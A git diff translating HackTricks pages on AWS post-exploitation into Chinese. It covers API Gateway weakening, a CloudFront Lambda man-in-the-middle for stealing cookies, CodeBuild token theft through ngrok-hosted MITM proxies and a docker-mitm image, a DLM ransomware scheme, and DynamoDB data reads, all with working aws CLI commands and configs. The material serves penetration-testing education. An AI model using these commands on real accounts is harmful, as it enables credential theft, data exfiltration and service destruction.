+**潜在影响**:敏感信息泄露、执行恶意脚本或未经授权访问API资源。
> [!NOTE]
-> Need testing
+> 需要测试
### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
-
+拥有权限 `apigateway:UpdateRestApi` 和 `apigateway:CreateDeployment` 的攻击者可以**修改API Gateway REST API设置以禁用日志记录或更改最低TLS版本,从而可能削弱API的安全性**。
```bash
API_ID="your-api-id"
@@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
+**潜在影响**:削弱API的安全性,可能允许未经授权的访问或暴露敏感信息。
> [!NOTE]
-> Need testing
+> 需要测试
### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
-An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
-
+拥有权限 `apigateway:CreateApiKey`、`apigateway:UpdateApiKey`、`apigateway:CreateUsagePlan` 和 `apigateway:CreateUsagePlanKey` 的攻击者可以**创建新的API密钥,将其与使用计划关联,然后使用这些密钥未经授权访问API**。
```bash
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
@@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
```
-
-**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
+**潜在影响**:未经授权访问API资源,绕过安全控制。
> [!NOTE]
-> Need testing
+> 需要测试
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
index 4a3c4ff21..e415ff360 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
@@ -1,35 +1,31 @@
-# AWS - CloudFront Post Exploitation
+# AWS - CloudFront 后期利用
{{#include ../../../banners/hacktricks-training.md}}
## CloudFront
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-cloudfront-enum.md
{{#endref}}
-### Man-in-the-Middle
+### 中间人攻击
-This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+这篇 [**博客文章**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) 提出了几种不同的场景,其中可以将 **Lambda** 添加(或在已使用的情况下进行修改)到 **通过 CloudFront 的通信中**,目的是 **窃取** 用户信息(如会话 **cookie**)并 **修改** **响应**(注入恶意 JS 脚本)。
-#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+#### 场景 1:中间人攻击,其中 CloudFront 配置为访问某个存储桶的 HTML
-- **Create** the malicious **function**.
-- **Associate** it with the CloudFront distribution.
-- Set the **event type to "Viewer Response"**.
+- **创建** 恶意 **函数**。
+- **将其与 CloudFront 分发关联**。
+- 将 **事件类型设置为 "Viewer Response"**。
-Accessing the response you could steal the users cookie and inject a malicious JS.
+访问响应后,您可以窃取用户的 cookie 并注入恶意 JS。
-#### scenario 2: MitM where CloudFront is already using a lambda function
+#### 场景 2:中间人攻击,其中 CloudFront 已在使用 lambda 函数
-- **Modify the code** of the lambda function to steal sensitive information
+- **修改 lambda 函数的代码** 以窃取敏感信息
-You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+您可以在这里查看 [**tf 代码以重现这些场景**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main)。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
index 54be4e299..204ffb1ec 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -1,88 +1,76 @@
-# AWS - CodeBuild Post Exploitation
+# AWS - CodeBuild 后期利用
{{#include ../../../../banners/hacktricks-training.md}}
## CodeBuild
-For more information, check:
+有关更多信息,请查看:
{{#ref}}
../../aws-services/aws-codebuild-enum.md
{{#endref}}
-### Check Secrets
+### 检查秘密
-If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
-Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+如果在 Codebuild 中设置了凭据以连接到 Github、Gitlab 或 Bitbucket,形式为个人令牌、密码或 OAuth 令牌访问,这些 **凭据将作为秘密存储在秘密管理器中**。\
+因此,如果您有权限读取秘密管理器,您将能够获取这些秘密并转向连接的平台。
{{#ref}}
../../aws-privilege-escalation/aws-secrets-manager-privesc.md
{{#endref}}
-### Abuse CodeBuild Repo Access
+### 滥用 CodeBuild 仓库访问
-In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+为了配置 **CodeBuild**,它需要 **访问将要使用的代码仓库**。多个平台可能托管此代码:
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+**CodeBuild 项目必须具有** 对配置的源提供程序的访问权限,可以通过 **IAM 角色** 或使用 github/bitbucket **令牌或 OAuth 访问**。
-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+具有 **CodeBuild 中提升权限的攻击者** 可以滥用此配置的访问权限,泄露配置仓库的代码以及设置凭据有访问权限的其他仓库。\
+为了做到这一点,攻击者只需 **将仓库 URL 更改为配置凭据有访问权限的每个仓库**(请注意,aws 网站会为您列出所有这些):
-And **change the Buildspec commands to exfiltrate each repo**.
+并且 **更改 Buildspec 命令以提取每个仓库**。
> [!WARNING]
-> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
-> Or does he? Check the next section
+> 然而,这 **项任务是重复且乏味的**,如果配置了具有 **写权限** 的 github 令牌,攻击者 **将无法(滥)用这些权限**,因为他没有访问令牌。\
+> 或者他有吗?查看下一部分
-### Leaking Access Tokens from AWS CodeBuild
-
-You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+### 从 AWS CodeBuild 泄露访问令牌
+您可以泄露在 CodeBuild 中授予的平台访问权限,例如 Github。检查是否授予了对外部平台的任何访问权限:
```bash
aws codebuild list-source-credentials
```
-
{{#ref}}
aws-codebuild-token-leakage.md
{{#endref}}
### `codebuild:DeleteProject`
-An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
-
+攻击者可以删除整个 CodeBuild 项目,导致项目配置丢失,并影响依赖该项目的应用程序。
```bash
aws codebuild delete-project --name
```
-
-**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+**潜在影响**:项目配置丢失和使用已删除项目的应用程序服务中断。
### `codebuild:TagResource` , `codebuild:UntagResource`
-An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+攻击者可以添加、修改或删除CodeBuild资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。
```bash
aws codebuild tag-resource --resource-arn --tags
aws codebuild untag-resource --resource-arn --tag-keys
```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。
### `codebuild:DeleteSourceCredentials`
-An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
-
+攻击者可以删除 Git 存储库的源凭证,影响依赖该存储库的应用程序的正常运行。
```sql
aws codebuild delete-source-credentials --arn
```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+**潜在影响**:由于源凭证的删除,依赖受影响存储库的应用程序的正常功能受到干扰。
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
index c514d7a7c..227cb4d8d 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -2,73 +2,68 @@
{{#include ../../../../banners/hacktricks-training.md}}
-## Recover Github/Bitbucket Configured Tokens
-
-First, check if there are any source credentials configured that you could leak:
+## 恢复 Github/Bitbucket 配置的令牌
+首先,检查是否配置了任何源凭据,以便您可以泄露:
```bash
aws codebuild list-source-credentials
```
+### 通过 Docker 镜像
-### Via Docker Image
+如果你发现例如 Github 的认证已在账户中设置,你可以通过让 Codebuild **使用特定的 docker 镜像** 来运行项目的构建,从而 **提取** 该 **访问** (**GH token 或 OAuth token**)。
-If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
+为此,你可以 **创建一个新的 Codebuild 项目** 或更改现有项目的 **环境** 以设置 **Docker 镜像**。
-For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
+你可以使用的 Docker 镜像是 [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm)。这是一个非常基础的 Docker 镜像,将设置 **环境变量 `https_proxy`**、**`http_proxy`** 和 **`SSL_CERT_FILE`**。这将允许你拦截在 **`https_proxy`** 和 **`http_proxy`** 中指示的主机的大部分流量,并信任在 **`SSL_CERT_FILE`** 中指示的 SSL 证书。
-The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
-
-1. **Create & Upload your own Docker MitM image**
- - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
- - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
- - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
- - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
-2. **Set the environment**
- - Create a **new Codebuild project** or **modify** the environment of an existing one.
- - Set the project to use the **previously generated Docker image**
+1. **创建并上传你自己的 Docker MitM 镜像**
+- 按照仓库的说明设置你的代理 IP 地址并设置你的 SSL 证书,然后 **构建 docker 镜像**。
+- **不要设置 `http_proxy`** 以避免拦截对元数据端点的请求。
+- 你可以使用 **`ngrok`**,例如 `ngrok tcp 4444` 来将代理设置为你的主机。
+- 一旦你构建了 Docker 镜像,**将其上传到公共仓库**(Dockerhub, ECR...)。
+2. **设置环境**
+- 创建一个 **新的 Codebuild 项目** 或 **修改** 现有项目的环境。
+- 设置项目使用 **之前生成的 Docker 镜像**。
-3. **Set the MitM proxy in your host**
-
-- As indicated in the **Github repo** you could use something like:
+3. **在你的主机上设置 MitM 代理**
+- 如 **Github 仓库** 中所示,你可以使用类似的东西:
```bash
mitmproxy --listen-port 4444 --allow-hosts "github.com"
```
-
> [!TIP]
-> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+> 使用的 **mitmproxy 版本是 9.0.1**,据报道在版本 10 中这可能无法工作。
-4. **Run the build & capture the credentials**
+4. **运行构建并捕获凭证**
-- You can see the token in the **Authorization** header:
+- 您可以在 **Authorization** 头中看到令牌:
-
-
-This could also be done from the aws cli with something like
+
+这也可以通过 aws cli 以类似的方式完成。
```bash
# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
## With /tmp/buildspec.json
{
- "name": "my-demo-project",
- "source": {
- "type": "GITHUB",
- "location": "https://github.com/uname/repo",
- "buildspec": "buildspec.yml"
- },
- "artifacts": {
- "type": "NO_ARTIFACTS"
- },
- "environment": {
- "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
- "image": "docker.io/carlospolop/docker-mitm:v12",
- "computeType": "BUILD_GENERAL1_SMALL",
- "imagePullCredentialsType": "CODEBUILD"
- }
+"name": "my-demo-project",
+"source": {
+"type": "GITHUB",
+"location": "https://github.com/uname/repo",
+"buildspec": "buildspec.yml"
+},
+"artifacts": {
+"type": "NO_ARTIFACTS"
+},
+"environment": {
+"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
+"image": "docker.io/carlospolop/docker-mitm:v12",
+"computeType": "BUILD_GENERAL1_SMALL",
+"imagePullCredentialsType": "CODEBUILD"
+}
}
## Json
@@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
# Start the build
aws codebuild start-build --project-name my-project2
```
+### 通过 insecureSSL
-### Via insecureSSL
-
-**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
-Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
-
-- First you need to enumerate the current configuration with something like:
+**Codebuild** 项目有一个名为 **`insecureSsl`** 的设置,该设置在网页中隐藏,您只能通过 API 更改它。\
+启用此选项后,Codebuild 可以连接到存储库 **而不检查** 平台提供的证书。
+- 首先,您需要使用类似以下的方式枚举当前配置:
```bash
aws codebuild batch-get-projects --name
```
-
-- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
- - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:
-
+- 然后,使用收集到的信息,您可以将项目设置 **`insecureSsl`** 更新为 **`True`**。以下是我更新项目的示例,请注意最后的 **`insecureSsl=True`**(这是您需要从收集的配置中更改的唯一内容)。
+- 此外,还要添加环境变量 **http_proxy** 和 **https_proxy**,指向您的 tcp ngrok,如:
```bash
aws codebuild update-project --name \
- --source '{
- "type": "GITHUB",
- "location": "https://github.com/carlospolop/404checker",
- "gitCloneDepth": 1,
- "gitSubmodulesConfig": {
- "fetchSubmodules": false
- },
- "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
- "auth": {
- "type": "CODECONNECTIONS",
- "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
- },
- "reportBuildStatus": false,
- "insecureSsl": true
- }' \
- --environment '{
- "type": "LINUX_CONTAINER",
- "image": "aws/codebuild/standard:5.0",
- "computeType": "BUILD_GENERAL1_SMALL",
- "environmentVariables": [
- {
- "name": "http_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- },
- {
- "name": "https_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- }
- ]
- }'
+--source '{
+"type": "GITHUB",
+"location": "https://github.com/carlospolop/404checker",
+"gitCloneDepth": 1,
+"gitSubmodulesConfig": {
+"fetchSubmodules": false
+},
+"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
+"auth": {
+"type": "CODECONNECTIONS",
+"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
+},
+"reportBuildStatus": false,
+"insecureSsl": true
+}' \
+--environment '{
+"type": "LINUX_CONTAINER",
+"image": "aws/codebuild/standard:5.0",
+"computeType": "BUILD_GENERAL1_SMALL",
+"environmentVariables": [
+{
+"name": "http_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+},
+{
+"name": "https_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+}
+]
+}'
```
-
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)运行 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
- host="127.0.0.1",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
+host="127.0.0.1",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
-
-- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- 最后,点击 **Build the project**,**凭证**将以 **明文**(base64)发送到 mitm 端口:
-### ~~Via HTTP protocol~~
+### ~~通过 HTTP 协议~~
-> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+> [!TIP] > **这个漏洞在 2023 年 2 月 20 日那周的某个时候被 AWS 修复了(我想是星期五)。所以攻击者不能再利用它了 :)**
-An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+具有 **提升权限的攻击者在 CodeBuild 中可能会泄露配置的 Github/Bitbucket 令牌**,或者如果权限是通过 OAuth 配置的,则 **用于访问代码的临时 OAuth 令牌**。
-- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
+- 攻击者可以将环境变量 **http_proxy** 和 **https_proxy** 添加到 CodeBuild 项目,指向他的机器(例如 `http://5.tcp.eu.ngrok.io:14972`)。
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- 然后,将 github 仓库的 URL 更改为使用 HTTP 而不是 HTTPS,例如:`http://github.com/carlospolop-forks/TestActions`
+- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)上运行来自 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例。
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
- host="0.0.0.0",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
+host="0.0.0.0",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
-
-- Next, click on **Build the project** or start the build from command line:
-
+- 接下来,点击 **Build the project** 或从命令行启动构建:
```sh
aws codebuild start-build --project-name
```
-
-- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- 最后,**凭证**将以**明文**(base64)发送到mitm端口:
> [!WARNING]
-> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
+> 现在攻击者将能够从他的机器上使用令牌,列出它拥有的所有权限,并比直接使用CodeBuild服务更容易地(滥用)它。
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
index f1c6fb394..405179302 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
@@ -8,17 +8,11 @@
../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
{{#endref}}
-### Enable / Disable Controls
-
-To further exploit an account, you might need to disable/enable Control Tower controls:
+### 启用 / 禁用控制
+为了进一步利用一个账户,您可能需要禁用/启用 Control Tower 控制:
```bash
aws controltower disable-control --control-identifier --target-identifier
aws controltower enable-control --control-identifier --target-identifier
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
index baa309e53..f1707135a 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -1,99 +1,91 @@
-# AWS - DLM Post Exploitation
+# AWS - DLM 后期利用
{{#include ../../../banners/hacktricks-training.md}}
-## Data Lifecycle Manger (DLM)
+## 数据生命周期管理器 (DLM)
### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
-A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+勒索软件攻击可以通过加密尽可能多的 EBS 卷,然后删除当前的 EC2 实例、EBS 卷和快照来执行。为了自动化这一恶意活动,可以使用 Amazon DLM,使用来自另一个 AWS 账户的 KMS 密钥加密快照,并将加密的快照转移到不同的账户。或者,他们可能会将未加密的快照转移到他们管理的账户,然后在那里进行加密。尽管直接加密现有的 EBS 卷或快照并不简单,但可以通过创建新的卷或快照来实现。
-Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+首先,将使用一个命令收集卷的信息,例如实例 ID、卷 ID、加密状态、附加状态和卷类型。
`aws ec2 describe-volumes`
-Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
-
+其次,将创建生命周期策略。此命令使用 DLM API 设置一个生命周期策略,该策略会在指定时间自动对指定卷进行每日快照。它还会将特定标签应用于快照,并将卷的标签复制到快照中。policyDetails.json 文件包含生命周期策略的具体信息,例如目标标签、计划、用于加密的可选 KMS 密钥的 ARN,以及快照共享的目标账户,这些信息将记录在受害者的 CloudTrail 日志中。
```bash
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
```
-
-A template for the policy document can be seen here:
-
+可以在这里看到政策文档的模板:
```bash
{
- "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
- "ResourceTypes": [
- "VOLUME"
- ],
- "TargetTags": [
- {
- "Key": "ExampleKey",
- "Value": "ExampleValue"
- }
- ],
- "Schedules": [
- {
- "Name": "DailySnapshots",
- "CopyTags": true,
- "TagsToAdd": [
- {
- "Key": "SnapshotCreator",
- "Value": "DLM"
- }
- ],
- "VariableTags": [
- {
- "Key": "CostCenter",
- "Value": "Finance"
- }
- ],
- "CreateRule": {
- "Interval": 24,
- "IntervalUnit": "HOURS",
- "Times": [
- "03:00"
- ]
- },
- "RetainRule": {
- "Count": 14
- },
- "FastRestoreRule": {
- "Count": 2,
- "Interval": 12,
- "IntervalUnit": "HOURS"
- },
- "CrossRegionCopyRules": [
- {
- "TargetRegion": "us-west-2",
- "Encrypted": true,
- "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
- "CopyTags": true,
- "RetainRule": {
- "Interval": 1,
- "IntervalUnit": "DAYS"
- }
- }
- ],
- "ShareRules": [
- {
- "TargetAccounts": [
- "123456789012"
- ],
- "UnshareInterval": 30,
- "UnshareIntervalUnit": "DAYS"
- }
- ]
- }
- ],
- "Parameters": {
- "ExcludeBootVolume": false
- }
+"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+"ResourceTypes": [
+"VOLUME"
+],
+"TargetTags": [
+{
+"Key": "ExampleKey",
+"Value": "ExampleValue"
+}
+],
+"Schedules": [
+{
+"Name": "DailySnapshots",
+"CopyTags": true,
+"TagsToAdd": [
+{
+"Key": "SnapshotCreator",
+"Value": "DLM"
+}
+],
+"VariableTags": [
+{
+"Key": "CostCenter",
+"Value": "Finance"
+}
+],
+"CreateRule": {
+"Interval": 24,
+"IntervalUnit": "HOURS",
+"Times": [
+"03:00"
+]
+},
+"RetainRule": {
+"Count": 14
+},
+"FastRestoreRule": {
+"Count": 2,
+"Interval": 12,
+"IntervalUnit": "HOURS"
+},
+"CrossRegionCopyRules": [
+{
+"TargetRegion": "us-west-2",
+"Encrypted": true,
+"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+"CopyTags": true,
+"RetainRule": {
+"Interval": 1,
+"IntervalUnit": "DAYS"
+}
+}
+],
+"ShareRules": [
+{
+"TargetAccounts": [
+"123456789012"
+],
+"UnshareInterval": 30,
+"UnshareIntervalUnit": "DAYS"
+}
+]
+}
+],
+"Parameters": {
+"ExcludeBootVolume": false
+}
}
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
index d63689d9e..7962b57ee 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -1,10 +1,10 @@
-# AWS - DynamoDB Post Exploitation
+# AWS - DynamoDB 后期利用
{{#include ../../../banners/hacktricks-training.md}}
## DynamoDB
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
### `dynamodb:BatchGetItem`
-An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
+具有此权限的攻击者将能够 **通过主键从表中获取项目**(您不能仅请求表的所有数据)。这意味着您需要知道主键(您可以通过获取表元数据(`describe-table`)来获取此信息)。
{{#tabs }}
{{#tab name="json file" }}
-
```bash
aws dynamodb batch-get-item --request-items file:///tmp/a.json
// With a.json
{
- "ProductCatalog" : { // This is the table name
- "Keys": [
- {
- "Id" : { // Primary keys name
- "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
- }
- }
- ]
- }
+"ProductCatalog" : { // This is the table name
+"Keys": [
+{
+"Id" : { // Primary keys name
+"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
+}
+}
+]
+}
}
```
-
{{#endtab }}
{{#tab name="inline" }}
-
```bash
aws dynamodb batch-get-item \
- --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
- --region
+--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**潜在影响:** 通过在表中定位敏感信息进行间接权限提升
### `dynamodb:GetItem`
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
-
+**与之前的权限类似,** 这允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值:
```json
aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json
// With a.json
{
"Id" : {
- "N": "205"
+"N": "205"
}
}
```
-
-With this permission it's also possible to use the **`transact-get-items`** method like:
-
+使用此权限,还可以使用 **`transact-get-items`** 方法,如下所示:
```json
aws dynamodb transact-get-items \
- --transact-items file:///tmp/a.json
+--transact-items file:///tmp/a.json
// With a.json
[
- {
- "Get": {
- "Key": {
- "Id": {"N": "205"}
- },
- "TableName": "ProductCatalog"
- }
- }
+{
+"Get": {
+"Key": {
+"Id": {"N": "205"}
+},
+"TableName": "ProductCatalog"
+}
+}
]
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**潜在影响:** 通过定位表中的敏感信息进行间接权限提升
### `dynamodb:Query`
